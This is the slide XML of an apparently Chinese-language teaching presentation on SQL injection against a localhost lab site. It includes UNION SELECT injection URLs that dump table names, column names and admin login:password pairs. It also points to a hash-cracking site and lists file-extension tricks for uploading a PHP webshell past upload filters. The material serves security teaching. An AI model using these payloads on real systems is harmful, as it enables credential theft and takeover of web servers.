      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356889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398179"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011895" y="1592019"/>
            <a:ext cx="10266329" cy="4032174"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一个攻击者通过在查询语句中插入一系列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句来将数据写入到应用程序中，这种方法就可以定义成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>从一个数据库获得未经授权的访问和直接检索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入攻击就其本质而言，它利用的工具是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的语法，针对的是应用程序开发者编程过程中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>当攻击者能够操作数据，往应用程序中插入一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>语句时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" u="sng" dirty="0"/>
              <a:t>注入攻击就发生了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”。实际上，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入是存在于常见的多连接的应用程序中一种漏洞，攻击者通过在应用程序中预先定义好的查询语句结尾加上额外的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句元素，欺骗数据库服务器执行非授权的任意查询。这类应用程序一般是网络应用程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(Web Application)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，它允许用户输入查询条件，并将查询条件嵌入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求语句中，发送到与该应用程序相关联的数据库服务器中去执行。通过构造一些畸形的输入，攻击者能够操作这种请求语句去获取预先未知的结果。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1243908" y="5499258"/>
            <a:ext cx="8672887" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>资料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>来源：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>必应词典 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> injection]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>	 http://www.bing.com/knows/search?q=sql+injection&amp;mkt=zh-cn&amp;FORM=BKACAI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291241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62083" y="1685580"/>
            <a:ext cx="11017493" cy="4671152"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>利用返回的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>meta-information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>构建最终</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>提供关于数据库、表、列的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>meta-information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，这些信息储存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库里</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>the list of tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>localhost/cat.php?id=1%20UNION%20SELECT%201,table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" dirty="0" smtClean="0"/>
              <a:t>name,3,4%20FROM%20information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UNION SELECT 1,table_name,3,4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>the list of columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://localhost/cat.php?id=1%20UNION%20SELECT%201,column_name,3,4%20FROM%20information_schema.columns</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913149" y="25465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sz="4800" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" smtClean="0"/>
              <a:t>注入和利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4111314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62083" y="1685580"/>
            <a:ext cx="11017493" cy="4671152"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>利用查询语句得到管理员账号与密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取用于访问管理页面的用户名和密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://localhost/cat.php?id=1%20UNION%20SELECT%201,concat(login,%27:%27,password),3,4%20FROM%20users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913149" y="25465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sz="4800" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" smtClean="0"/>
              <a:t>注入和利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1"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360" y="4010139"/>
            <a:ext cx="6973792" cy="1737913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3063949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462083" y="1685580"/>
            <a:ext cx="11017493" cy="4671152"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>利用网络查询或密码破解工具得到密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>明文            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>://pmd5.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913149" y="25465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sz="4800" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" smtClean="0"/>
              <a:t>注入和利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1"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324" y="2251170"/>
            <a:ext cx="6753225" cy="3705225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="227491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88011"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>绕过过滤上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1156776" y="1762699"/>
            <a:ext cx="10223647" cy="4560983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>就是以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门文件与网站服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目录下正常的网页文件混在一起，然后就可以使用浏览器来访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后门，得到一个命令执行环境，以达到控制网站服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>账号密码登陆网站，找到上传文件位置，上传一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>脚本 ，如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件被过滤了则可选</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP3——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php.test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>绕</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤器，但</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>仍会将它视作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，因为配置中没有对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件的处理器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</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4243551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88011"/>
            <a:ext cx="10364451" cy="1596177"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>绕过过滤上传</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
